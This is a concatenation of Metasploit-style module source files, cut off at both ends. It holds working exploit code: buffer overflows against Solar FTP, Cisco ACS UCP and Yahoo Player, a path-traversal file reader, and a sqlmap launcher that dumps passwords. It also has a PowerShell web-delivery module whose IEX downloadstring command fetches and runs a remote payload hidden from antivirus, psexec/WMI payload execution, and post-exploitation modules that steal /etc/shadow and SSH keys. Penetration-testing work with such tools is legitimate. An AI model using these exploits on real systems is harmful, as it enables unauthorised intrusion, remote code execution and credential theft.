Msf::Exploit::Remote::Ftp 17 | Rank = AverageRanking 18 | 19 | def initialize(info={}) 20 | super(update_info(info, 21 | 'Name' => 'Solar FTP 2.1.1 PASV Command Buffer Overflow', 22 | 'Description' => %q{ 23 | This module exploits a Solar FTP 2.1.1 Server Buffer Overflow 24 | when passing an overly long argument to the PASV command. This 25 | vulnerability has been found by Craig Freyman and Gerardo Iglesias. 26 | }, 27 | 'Author' => 28 | [ 29 | #'Craig Freyman (@cd1zz) and Gerardo Iglesias (@iglesiasgg)',#Initial disclosure/PoC 30 | 'Alberto Certo ', #Metasploit module 31 | ], 32 | 'License' => MSF_LICENSE, 33 | 'Version' => '$Revision$', 34 | 'References'=> 35 | [ 36 | [ 'OSVDB', '70439'], 37 | [ 'URL', 'http://www.exploit-db.com/exploits/17527/' ], 38 | ], 39 | 'Privileged' => true, 40 | 'DefaultOptions'=> 41 | { 42 | 'EXITFUNC' => 'process', 43 | }, 44 | 'Payload'=> 45 | { 46 | 'Space' => 2000, 47 | 'BadChars' => "\x00", 48 | 'DisableNops' => true, 49 | }, 50 | 'Platform' => 'win', 51 | 'Targets' => 52 | [ 53 | # Tested on: Windows XP SP2/SP3 EN-FR 54 | [ 'Windows XP Universal', 55 | { 56 | 'Ret' => 0x1001bd23, # jmp eax in sfsweb.dll 57 | 'Offset' => 123, 58 | 'BuffSize' => 2127, 59 | } 60 | ], 61 | ], 62 | 'DefaultTarget' => 0, 63 | 'DisclosureDate' => 'Jul 12 2011')) 64 | 65 | register_options( 66 | [ 67 | Opt::RPORT(21) 68 | ],self.class) 69 | end 70 | 71 | def check 72 | connect 73 | disconnect 74 | 75 | if (banner =~ /Solar FTP Server/) 76 | return Exploit::CheckCode::Detected 77 | end 78 | 79 | return Exploit::CheckCode::Safe 80 | 81 | rescue ::Exception => e 82 | print_error("An error has occured: #{e.to_s}") 83 | end 84 | 85 | def exploit 86 | 87 | connect_login 88 | print_status("Trying target #{target.name}...") 89 | 90 | # The RET address points to a JMP EAX that jumps at the beginning of a buffer 91 | # containing the forged PASV command below. However, the first 8 bytes are 92 | # overwritten with junk code. Depending on the generated NOP sled, the server 93 | # can crash due to non-readable instructions. We prepend then a string ("BEEFF") 94 | # to our sploit string to force making the junk code harmless. 95 | sploit = "BEEFF" + make_nops(target['Offset']-7) + Rex::Arch::X86.jmp_short(4) 96 | sploit << [target.ret].pack('V') 97 | sploit << payload.encoded 98 | sploit << make_nops(target['BuffSize'] - sploit.length) 99 | 100 | send_cmd( ['PASV', sploit] , false) 101 | 102 | handler 103 | disconnect 104 | end 105 | end 106 | -------------------------------------------------------------------------------- /modules/exploits/unstable/untested/arachni_path_traversal.rb: -------------------------------------------------------------------------------- 1 | require 'msf/core' 2 | 3 | class Metasploit3 < Msf::Auxiliary 4 | 5 | include Msf::Exploit::Remote::HttpClient 6 | 7 | def initialize(info = {}) 8 | super(update_info(info, 9 | 'Name' => 'Arachni Path Traversal Module', 10 | 'Description' => %q{ 11 | It exploits path traversal vulnerabilities in order to read the contents of a remote file. 12 | It will also try to clean-up any HMTL code that does not belong to the file. 13 | 14 | This module is designed to be used with the Arachni plug-in. 15 | }, 16 | 'Author' => [ 17 | 'Tasos "Zapotek" Laskos ', 18 | ], 19 | 'License' => BSD_LICENSE, 20 | 'Version' => '$Revision$', 21 | 'References' => 22 | [ 23 | ['URL', 'http://github.com/Zapotek/arachni'] 24 | ] 25 | )) 26 | 27 | register_options( [ 28 | OptString.new( 'GET', [ false, "GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ), 29 | OptString.new( 'POST', [ false, "POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ), 30 | OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ), 31 | OptString.new( 'HEADERS', [ false, "Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ), 32 | OptString.new( 'PATH', [ true, "The path to the vulnerable script.", "/cgi-bin/generic" ] ), 33 | OptString.new( 'FILE', [ true, "The file to grab.", "/etc/passwd" ] ), 34 | ], self.class ) 35 | end 36 | 37 | def run 38 | # 39 | # There must be a better way to get the diff but this is good enough for now 40 | # 41 | begin 42 | file_orig = datastore['FILE'].dup 43 | splits_file = get_file.split( /\w*$/ ) 44 | 45 | datastore['FILE'] = '/' 46 | 47 | splits_empty = get_file.split( /\w*$/ ) 48 | 49 | print_line (splits_file - splits_empty).join 50 | ensure 51 | datastore['FILE'] = file_orig.dup 52 | end 53 | 54 | end 55 | 56 | def get_file 57 | cookies = _sub_injection( datastore['COOKIES'].to_s, ';' ) 58 | headers = _str_to_hash( _sub_injection( datastore['HEADERS'].to_s, '::' ), '::' ) 59 | post = _str_to_hash( _sub_injection( datastore['POST'].to_s ) ) 60 | get = _str_to_hash( _sub_injection( datastore['GET'].to_s ) ) 61 | uri = datastore['PATH'].to_s 62 | method = post.empty? ? 'GET' : 'POST' 63 | 64 | if( post.empty? && get.empty? && headers.empty? && cookies.empty? ) 65 | print_error( 'At least one of GET/POST/COOKIES/HEADERS must be set.' ) 66 | return 67 | end 68 | 69 | print_status( "Sending HTTP request for #{uri}" ) 70 | res = send_request_cgi( { 71 | 'global' => true, 72 | 'uri' => uri, 73 | 'method' => method, 74 | 'vars_get' => get, 75 | 'vars_post' => post, 76 | 'headers' => headers, 77 | 'cookie' => cookies 78 | }, 0.01 ) 79 | 80 | return res.body 81 | end 82 | 83 | # 84 | # Converts a URI styled query string into a key=>value hash 85 | # 86 | def _str_to_hash( str, sep = '&' ) 87 | hash = {} 88 | str.split( sep ).map do |part| 89 | splits = part.split( '=', 2 ) 90 | next if !splits[0] || !splits[1] 91 | hash[splits[0]] = splits[1] 92 | end 93 | 94 | return hash 95 | end 96 | 97 | # 98 | # Substitutes 'XXinjectionXX' in values of a URI styled query string with the 99 | # payload 100 | # 101 | def _sub_injection( str, sep = '&' ) 102 | 103 | return str.to_s.split( sep ).map do |var| 104 | k,v = var.split( '=', 2 ) 105 | next if !v || !k 106 | 107 | k + "=" + v.gsub( 'XXinjectionXX', datastore['FILE'].to_s ) 108 | end.reject do |i| !i end.join( sep ) 109 | end 110 | 111 | 112 | end 113 | 114 | -------------------------------------------------------------------------------- /modules/exploits/unstable/untested/arachni_sqlmap.rb: -------------------------------------------------------------------------------- 1 | require 'msf/core' 2 | 3 | class Metasploit3 < Msf::Auxiliary 4 | 5 | include Msf::Exploit::Remote::HttpClient 6 | 7 | def initialize(info = {}) 8 | super(update_info(info, 9 | 'Name' => 'Arachni SQLMAP SQL Injection External Module', 10 | 'Description' => %q{ 11 | 12 | This module is designed to be used with the Arachni plug-in. 13 | 14 | From the original: 15 | 16 | This module launches an sqlmap session. 17 | sqlmap is an automatic SQL injection tool developed in Python. 18 | Its goal is to detect and take advantage of SQL injection 19 | vulnerabilities on web applications. Once it detects one 20 | or more SQL injections on the target host, the user can 21 | choose among a variety of options to perform an extensive 22 | back-end database management system fingerprint, retrieve 23 | DBMS session user and database, enumerate users, password 24 | hashes, privileges, databases, dump entire or user 25 | specific DBMS tables/columns, run his own SQL SELECT 26 | statement, read specific files on the file system and much 27 | more. 28 | }, 29 | 'Author' => [ 30 | 'Tasos "Zapotek" Laskos ', # modified to work with the Arachni plug-in 31 | 'Bernardo Damele A. G. ' # original module: auxiliary/scanner/http/sqlmap.rb 32 | ], 33 | 'License' => BSD_LICENSE, 34 | 'Version' => '$Revision$', 35 | 'References' => 36 | [ 37 | ['URL', 'http://github.com/Zapotek/arachni'], 38 | ['URL', 'http://sqlmap.sourceforge.net'], 39 | ] 40 | )) 41 | 42 | register_options( 43 | [ 44 | OptString.new('METHOD', [ true, "HTTP Method", 'GET' ]), 45 | OptString.new('PATH', [ true, "The path to test for SQL injection", 'index.php' ]), 46 | OptString.new('GET', [ false, "HTTP GET query", 'id=1' ]), 47 | OptString.new('POST', [ false, "The data string to be sent through POST", '' ]), 48 | OptString.new('COOKIES', [ false, "", '' ]), 49 | OptString.new('OPTS', [ false, "The sqlmap options to use", '--users --time-test --passwords --dbs --sql-shell -v 0' ]), 50 | OptPath.new('SQLMAP_PATH', [ true, "The sqlmap >= 0.8 full path ", 'sqlmap' ]), 51 | ], self.class) 52 | end 53 | 54 | def run 55 | 56 | sqlmap = datastore['SQLMAP_PATH'] 57 | 58 | if not sqlmap 59 | print_error("The sqlmap script could not be found") 60 | return 61 | end 62 | 63 | data = datastore['POST'].gsub( 'XXinjectionXX', '' ) 64 | method = datastore['METHOD'].upcase 65 | 66 | sqlmap_url = (datastore['SSL'] ? "https" : "http") 67 | sqlmap_url += "://" + datastore['RHOST'] + ":" + datastore['RPORT'] 68 | sqlmap_url += "/" + datastore['PATH'] 69 | 70 | if method == "GET" 71 | sqlmap_url += '?' + datastore['GET'].gsub( 'XXinjectionXX', '' ) 72 | end 73 | 74 | cmd = sqlmap + ' -u \'' + sqlmap_url + '\'' 75 | cmd += ' --method ' + method 76 | cmd += ' ' + datastore['OPTS'] 77 | cmd += ' --cookie \'' + datastore['COOKIES'].to_s + '\'' if datastore['COOKIES'] 78 | 79 | if not data.empty? 80 | cmd += ' --data \'' + data + '\'' 81 | end 82 | 83 | if datastore['BATCH'] == true 84 | cmd += ' --batch' 85 | end 86 | 87 | print_status("exec: #{cmd}") 88 | system( cmd ) 89 | end 90 | 91 | end 92 | 93 | -------------------------------------------------------------------------------- /modules/exploits/unstable/untested/cisco_acs_ucp.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/framework/ 6 | ## 7 | 8 | class Metasploit3 < Msf::Exploit::Remote 9 | Rank = AverageRanking 10 | 11 | include Msf::Exploit::Remote::HttpClient 12 | 13 | def initialize(info = {}) 14 | super(update_info(info, 15 | 'Name' => 'Cisco ACS 4.1 with UCP enabled pre-authentication buffer overflow', 16 | 'Description' => %q{ 17 | This module exploits a stack buffer overflow in CSUserCGI.exe which 18 | is Cisco's UCP CGI script for allowing users to change their passwords 19 | through ACS. The CGI /securecgi-bin/CSUserCGI.exe suffers from multiple buffer 20 | overflows exploitable remotely through the HTTP protocol before authentication. 21 | 22 | ACS/UCP versions prior to 4.2 are affected. 23 | }, 24 | 'Author' => 25 | [ 26 | 'Felix FX Lindner', # original discovery, poc 27 | 'Lincoln' # metasploit 28 | ], 29 | 'License' => MSF_LICENSE, 30 | 'References' => 31 | [ 32 | ['CVE', '2008-0532'], 33 | ['URL','http://www.securityfocus.com/archive/1/489463'], 34 | ['http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20080312-ucp'] 35 | ], 36 | 'DefaultOptions' => 37 | { 38 | 'EXITFUNC' => 'thread', 39 | }, 40 | 'Payload' => 41 | { 42 | 'BadChars' => [*(0x00..0x20)].pack("C*") + [0x2b, 0x3b, 0x7e, 0x7f].pack("C*") + [*(0x80..0xff)].pack("C*"), 43 | 'EncoderOptions' => 44 | { 45 | 'BufferRegister' => 'EDX' 46 | } 47 | }, 48 | 'Platform' => 'win', 49 | 'Privileged' => false, 50 | 'Targets' => 51 | [ 52 | # custom p/p/r taking advantage of null from CSUserCGI.exe 53 | [ 'Windows 2003 SP0 Eng', { 'Ret' => 0x414a7042, }] 54 | ], 55 | 'DefaultTarget' => 0, 56 | 'DisclosureDate' => 'Mar 03 2008')) 57 | 58 | register_options( 59 | [ 60 | Opt::RPORT(80) 61 | ], self.class ) 62 | end 63 | 64 | def exploit 65 | 66 | stub_asm = %Q| 67 | push esi 68 | pop edx 69 | | 70 | 71 | stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string 72 | 73 | buffer = "\x7a\x7c" 74 | buffer << rand_text_alpha(92) 75 | buffer << [target.ret].pack('V') 76 | buffer << "+" #act as null 77 | buffer << rand_text_alpha(27) 78 | buffer << stub 79 | buffer << "\x66\x81\xc2\xac" 80 | buffer << "+" #act as null 81 | buffer << "\xeb\x24" 82 | buffer << rand_text_alpha(36) 83 | buffer << payload.encoded 84 | 85 | print_status("Sending HTTP request") 86 | send_request_cgi({ 87 | 'uri' => '/securecgi-bin/CSUserCGI.exe?Logout+' + buffer, 88 | 'method' => 'GET' 89 | }, 25) 90 | 91 | disconnect 92 | handler 93 | end 94 | end 95 | -------------------------------------------------------------------------------- /modules/exploits/unstable/untested/yahoo_player_m3u.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = GoodRanking 16 | 17 | include Msf::Exploit::FILEFORMAT 18 | include Msf::Exploit::Remote::Seh 19 | 20 | def initialize(info = {}) 21 | super(update_info(info, 22 | 'Name' => 'yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH)', 23 | 'Description' => %q{ 24 | This module exploits a stack-based buffer overflow in Yahoo! Player 1.5.01.409. 25 | An attacker must send the file to victim and the victim must open the file. 26 | Alternatively it may be possible to execute code remotely via an embedded 27 | PLS file within a browser, when the PLS extention is registered to Yahoo! Player 1.5.01.409. 28 | This functionality has not been tested in this module. 29 | }, 30 | 'License' => MSF_LICENSE, 31 | 'Author' => 32 | [ 33 | 'D3r K0n!G', 34 | 'Death-Shadow-Dark ', 35 | ], 36 | 'References' => 37 | [ 38 | [ 'URL', 'http://www.exploit-db.com/exploits/17735' ], 39 | ], 40 | 'Payload' => 41 | { 42 | 'Space' => 5000, 43 | 'BadChars' => "\x00", 44 | 'StackAdjustment' => -3500, 45 | }, 46 | 'Platform' => 'win', 47 | 'Targets' => 48 | [ 49 | [ 'Windows Universal', { 'Ret' => 0x300117f7 } ], 50 | ], 51 | 'Privileged' => false, 52 | 'DisclosureDate' => 'Aug 28 2011', 53 | 'DefaultTarget' => 0)) 54 | 55 | register_options( 56 | [ 57 | OptString.new('FILENAME', [ true, 'The file name.', 'msf.m3u']), 58 | ], self.class) 59 | 60 | end 61 | 62 | def exploit 63 | 64 | sploit = rand_text_alpha_upper(2049) 65 | sploit << generate_seh_payload(target.ret) 66 | sploit << rand_text_alpha_upper(12) 67 | 68 | print_status("Creating '#{datastore['FILENAME']}' file ...") 69 | 70 | file_create(sploit) 71 | 72 | end 73 | 74 | end 75 | 76 | =begin 77 | http://dev.metasploit.com/redmine/issues/6381 78 | =end 79 | -------------------------------------------------------------------------------- /modules/exploits/windows/dcerpc/wmis_psh.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | ## 4 | # This module requires Metasploit: http//metasploit.com/download 5 | # Current source: https://github.com/rapid7/metasploit-framework 6 | ## 7 | 8 | require 'msf/core' 9 | require 'msf/core/exploit/powershell' 10 | 11 | 12 | class Metasploit3 < Msf::Exploit::Remote 13 | Rank = ManualRanking 14 | 15 | include Exploit::Remote::SMB::Authenticated 16 | include Msf::Exploit::Powershell 17 | 18 | def initialize(info = {}) 19 | super(update_info(info, 20 | 'Name' => 'Microsoft Windows Authenticated Powershell Command Execution', 21 | 'Description' => %q{ 22 | }, 23 | 24 | 'Author' => [ 25 | 'Ben Campbell ' 26 | ], 27 | 28 | 'License' => MSF_LICENSE, 29 | 'Privileged' => true, 30 | 'DefaultOptions' => 31 | { 32 | 'WfsDelay' => 20, 33 | 'EXITFUNC' => 'thread' 34 | }, 35 | 'Platform' => 'win', 36 | 'Targets' => 37 | [ 38 | [ 'Windows x86', { 'Arch' => ARCH_X86 } ], 39 | [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] 40 | ], 41 | 'DefaultTarget' => 0, 42 | 'DisclosureDate' => 'Jan 01 1999', 43 | 'References' => [ 44 | [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) 45 | [ 'OSVDB', '3106'], 46 | [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ], 47 | [ 'URL', 'http://sourceforge.net/projects/smbexec/' ], 48 | [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] 49 | ] 50 | )) 51 | end 52 | 53 | def exploit 54 | command = cmd_psh_payload(payload.encoded, 55 | payload_instance.arch.first, 56 | {:remove_comspec => true}) 57 | 58 | if datastore['PERSIST'] and not datastore['DisablePayloadHandler'] 59 | print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.") 60 | end 61 | 62 | if datastore['RUN_WOW64'] and target_arch.first == "x86_64" 63 | fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled") 64 | end 65 | 66 | user = datastore['SMBUser'] 67 | pass = datastore['SMBPass'] 68 | domain = "#{datastore['SMBDomain']}/" if datastore['SMBDomain'] 69 | 70 | command.gsub!("$","\\\\$") 71 | 72 | local_command = "pth-wmis -U #{domain}#{user}%#{pass} //#{datastore['RHOST']} \"#{command}\"" 73 | 74 | system(local_command) 75 | end 76 | 77 | def peer 78 | return "#{datastore['RHOST']}:#{datastore['RPORT']}" 79 | end 80 | end 81 | 82 | -------------------------------------------------------------------------------- /modules/exploits/windows/misc/psh_web_delivery.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | require 'msf/core/exploit/powershell' 8 | 9 | class Metasploit3 < Msf::Exploit::Remote 10 | Rank = NormalRanking 11 | 12 | include Msf::Exploit::Remote::HttpServer 13 | include Msf::Exploit::Powershell 14 | 15 | def initialize(info = {}) 16 | super(update_info(info, 17 | 'Name' => 'PowerShell Payload Web Delivery', 18 | 'Description' => %q{ 19 | This module quickly fires up a web server that serves the payload in PowerShell. 20 | The provided command will start PowerShell and then download and execute the 21 | payload. The IEX command can also be extracted to execute directly from PowerShell. 22 | The main purpose of this module is to quickly establish a session on a target 23 | machine when the attacker has to manually type in the command himself, e.g. RDP 24 | Session, Local Access or maybe Remote Command Exec. This attack vector does not 25 | write to disk so is less likely to trigger AV solutions and will allow privilege 26 | escalations supplied by Meterpreter. Ensure the payload architecture matches the 27 | target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. 28 | }, 29 | 'License' => MSF_LICENSE, 30 | 'Author' => 31 | [ 32 | 'Ben Campbell ', 33 | 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! 34 | ], 35 | 'References' => 36 | [ 37 | [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ], 38 | [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], 39 | [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] 40 | ], 41 | 'Platform' => 'win', 42 | 'Targets' => 43 | [ 44 | [ 'Windows x86', { 'Arch' => ARCH_X86 } ], 45 | [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] 46 | ], 47 | 'DefaultTarget' => 0, 48 | 'DisclosureDate' => 'Jul 19 2013')) 49 | end 50 | 51 | def on_request_uri(cli, request) 52 | print_status("Delivering Payload") 53 | data = Msf::Util::EXE.to_win32pe_psh_net(framework, 54 | payload.encoded, 55 | ) 56 | psh = cmd_psh_payload(payload.encoded, 57 | payload_instance.arch.first, 58 | { 59 | :remove_comspec => true, 60 | :use_single_quotes => true 61 | }) 62 | send_response(cli, psh, { 'Content-Type' => 'application/octet-stream' }) 63 | end 64 | 65 | def primer 66 | url = get_uri() 67 | download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" 68 | print_status("Run the following command on the target machine:") 69 | print_line generate_psh_command_line({ 70 | :noprofile => true, 71 | :windowstyle => 'hidden', 72 | :command => download_and_run 73 | }) 74 | end 75 | end 76 | 77 | -------------------------------------------------------------------------------- /modules/exploits/windows/smb/psexec_psh.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | ## 4 | # This module requires Metasploit: http//metasploit.com/download 5 | # Current source: https://github.com/rapid7/metasploit-framework 6 | ## 7 | 8 | require 'msf/core' 9 | require 'msf/core/exploit/powershell' 10 | 11 | class Metasploit3 < Msf::Exploit::Remote 12 | Rank = ManualRanking 13 | 14 | # Exploit mixins should be called first 15 | include Msf::Exploit::Remote::SMB::Psexec 16 | include Msf::Exploit::Powershell 17 | 18 | def initialize(info = {}) 19 | super(update_info(info, 20 | 'Name' => 'Microsoft Windows Authenticated Powershell Command Execution', 21 | 'Description' => %q{ 22 | This module uses a valid administrator username and password to execute a powershell 23 | payload using a similar technique to the "psexec" utility provided by SysInternals. The 24 | payload is encoded in base64 and executed from the commandline using the -encodedcommand 25 | flag. Using this method, the payload is never written to disk, and given that each payload 26 | is unique, is less prone to signature based detection. Since executing shellcode in .NET 27 | requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture 28 | must match that of the payload. Lastly, a persist option is provided to execute the payload 29 | in a while loop in order to maintain a form of persistence. In the event of a sandbox 30 | observing PSH execution, a delay and other obfuscation may be added to avoid detection. 31 | In order to avoid interactive process notifications for the current user, the psh payload has 32 | been reduced in size and wrapped in a powershell invocation which hides the window entirely. 33 | }, 34 | 35 | 'Author' => [ 36 | 'Royce @R3dy__ Davis ', # PSExec command module 37 | 'RageLtMan MSF_LICENSE, 40 | 'Privileged' => true, 41 | 'DefaultOptions' => 42 | { 43 | 'WfsDelay' => 10, 44 | 'EXITFUNC' => 'thread' 45 | }, 46 | 'Platform' => 'win', 47 | 'Targets' => 48 | [ 49 | [ 'Windows x86', { 'Arch' => ARCH_X86 } ], 50 | [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] 51 | ], 52 | 'DefaultTarget' => 0, 53 | 'DisclosureDate' => 'Jan 01 1999', 54 | 'References' => [ 55 | [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) 56 | [ 'OSVDB', '3106'], 57 | [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ], 58 | [ 'URL', 'http://sourceforge.net/projects/smbexec/' ], 59 | [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] 60 | ] 61 | )) 62 | 63 | register_options([ 64 | OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]), 65 | ], self.class) 66 | end 67 | 68 | def exploit 69 | command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) 70 | if datastore['DryRun'] 71 | print_good command.inspect 72 | return 73 | end 74 | 75 | if datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] 76 | print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option") 77 | end 78 | 79 | # Try and authenticate with given credentials 80 | if connect 81 | begin 82 | smb_login 83 | rescue StandardError => autherror 84 | fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") 85 | end 86 | # Execute the powershell command 87 | print_status("#{peer} - Executing the payload...") 88 | begin 89 | return psexec(command) 90 | rescue StandardError => exec_command_error 91 | fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}") 92 | ensure 93 | disconnect 94 | end 95 | end 96 | end 97 | 98 | def peer 99 | return "#{rhost}:#{rport}" 100 | end 101 | end 102 | 103 | -------------------------------------------------------------------------------- /modules/post/linux/q/passwd-shadow-ssh-jacker-meterpreter.rb: -------------------------------------------------------------------------------- 1 | # $Id: passwd-shadow-ssh-jacker-meterpreter.rb 2012-05-01 rapid7 $ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/common' 13 | require 'msf/core/post/file' 14 | require 'msf/core/post/linux/priv' 15 | require 'msf/core/post/linux/system' 16 | 17 | 18 | class Metasploit3 < Msf::Post 19 | 20 | include Msf::Post::Common 21 | include Msf::Post::File 22 | include Msf::Auxiliary::Report 23 | include Msf::Post::Linux::Priv 24 | include Msf::Post::Linux::System 25 | include Msf::Post::Unix 26 | def initialize(info={}) 27 | super( update_info( info, 28 | 'Name' => 'Linux Important Data Jacker', 29 | 'Description' => %q{ 30 | This module will download /etc/passwd /etc/shadow and try to find SSH keys and download them 31 | }, 32 | 'License' => MSF_LICENSE, 33 | 'Author' => [ 'balgan ','SSH based on ohdae module', ], 34 | 'Version' => '$Revision: 3195e713 $', 35 | 'Platform' => [ 'linux'], 36 | 'SessionTypes' => [ 'meterpreter'] 37 | )) 38 | end 39 | 40 | 41 | def execute(cmd) 42 | output = cmd_exec(cmd) 43 | return output 44 | end 45 | 46 | def run 47 | print_status("Attempting to steal information it will be saved in loot folder") 48 | jack_etc() 49 | get_ssh_keys() 50 | end 51 | 52 | def cat_file(filename) 53 | print_status("Download: #{filename}") 54 | output = read_file(filename) 55 | return output 56 | end 57 | 58 | def get_ssh_keys 59 | i = 0; 60 | dirs = execute("/usr/bin/find / -maxdepth 3 -name .ssh").split("\n") 61 | if dirs.empty? == true 62 | print_status("COULD NOT FIND .SSH, might be permissions issue") 63 | else 64 | print_status("Found SSH AT: #{dirs}") 65 | dirs.each do |d| 66 | files = execute("/bin/ls -a #{d}").chomp.split() 67 | files.each do |f| 68 | data = "" 69 | next if f =~/^(\.+)$/ 70 | print_status("Trying to extract: #{f} from #{d}") 71 | this_key = cat_file("#{d}/#{f}") 72 | begin 73 | filesaving = session.fs.file.new("#{d}/#{f}", "rb") 74 | until filesaving.eof? 75 | data << filesaving.read 76 | end 77 | store_loot("#{f}", "application/octet-stream", session, data, f, "loot #{f}") 78 | rescue ::Interrupt 79 | raise $! 80 | rescue ::Exception => e 81 | print_error("Failed to download #{f}: #{e.class} #{e}") 82 | end 83 | end 84 | end 85 | end 86 | end 87 | 88 | def jack_etc() 89 | filestojack = ["/etc/passwd", "/etc/shadow"] 90 | filestojack.each do |f| 91 | data = "" 92 | print_status("Looking for: #{f}") 93 | found = session.fs.file.stat(f) rescue nil 94 | return if not found 95 | begin 96 | filesaving = session.fs.file.new(f, "rb") 97 | until filesaving.eof? 98 | data << filesaving.read 99 | end 100 | store_loot("#{f}", "application/octet-stream", session, data, f, "loot #{f}") 101 | rescue ::Interrupt 102 | raise $! 103 | rescue ::Exception => e 104 | print_error("Failed to download #{f}: #{e.class} #{e}") 105 | end 106 | end 107 | end 108 | end 109 | -------------------------------------------------------------------------------- /modules/post/linux/q/passwd-shadow-ssh-jacker-shell.rb: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/common' 13 | require 'msf/core/post/file' 14 | require 'msf/core/post/linux/priv' 15 | require 'msf/core/post/linux/system' 16 | 17 | 18 | class Metasploit3 < Msf::Post 19 | 20 | include Msf::Post::Common 21 | include Msf::Post::File 22 | include Msf::Auxiliary::Report 23 | include Msf::Post::Linux::Priv 24 | include Msf::Post::Linux::System 25 | include Msf::Post::Unix 26 | def initialize(info={}) 27 | super( update_info( info, 28 | 'Name' => 'Linux Important Data Jacker - Shell Version', 29 | 'Description' => %q{ 30 | This module will download /etc/passwd /etc/shadow and try to find SSH keys and download them 31 | }, 32 | 'License' => MSF_LICENSE, 33 | 'Author' => [ 'balgan ','SSH Based on Jim Halfpenny'], 34 | 'Version' => '$Revision$', 35 | 'Platform' => [ 'linux'], 36 | 'SessionTypes' => [ 'shell'] 37 | )) 38 | end 39 | 40 | 41 | def run 42 | print_status("Attempting to steal information") 43 | jack_etc() 44 | get_ssh_keys() 45 | end 46 | 47 | def jack_etc() 48 | filestojack = ["/etc/passwd", "/etc/shadow"] 49 | filestojack.each do |file| 50 | print_status("Downloading #{file} -> #{file}") 51 | data = read_file("#{file}") 52 | store_loot("ssh.#{file}", "text/plain", session, data,"ssh_#{file}", "File #{file}") 53 | end 54 | end 55 | 56 | def get_ssh_keys() 57 | 58 | print_status("Finding .ssh directories") 59 | paths = enum_user_directories.map {|d| d + "/.ssh"} 60 | paths = paths.select { |d| directory?(d) } 61 | if paths.nil? or paths.empty? 62 | print_error("COULD NOT FIND .SSH, might be permissions issue") 63 | else 64 | paths.each do |path| 65 | path.chomp! 66 | sep = "/" 67 | files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/) 68 | print_status("PASSOU O LS") 69 | files.each do |file| 70 | print_status("Downloading #{path}#{sep}#{file} -> #{file}") 71 | data = read_file("#{path}#{sep}#{file}") 72 | store_loot("ssh.#{file}", "text/plain", session, data,"ssh_#{file}", "OpenSSH #{file} File") 73 | end 74 | end 75 | end 76 | end 77 | end 78 | -------------------------------------------------------------------------------- /modules/post/unstable/enum_users.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # ## This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/framework/ 6 | ## 7 | 8 | require 'msf/core' 9 | require 'rex' 10 | 11 | # Multi platform requiere 12 | require 'msf/core/post/common' 13 | require 'msf/core/post/file' 14 | 15 | 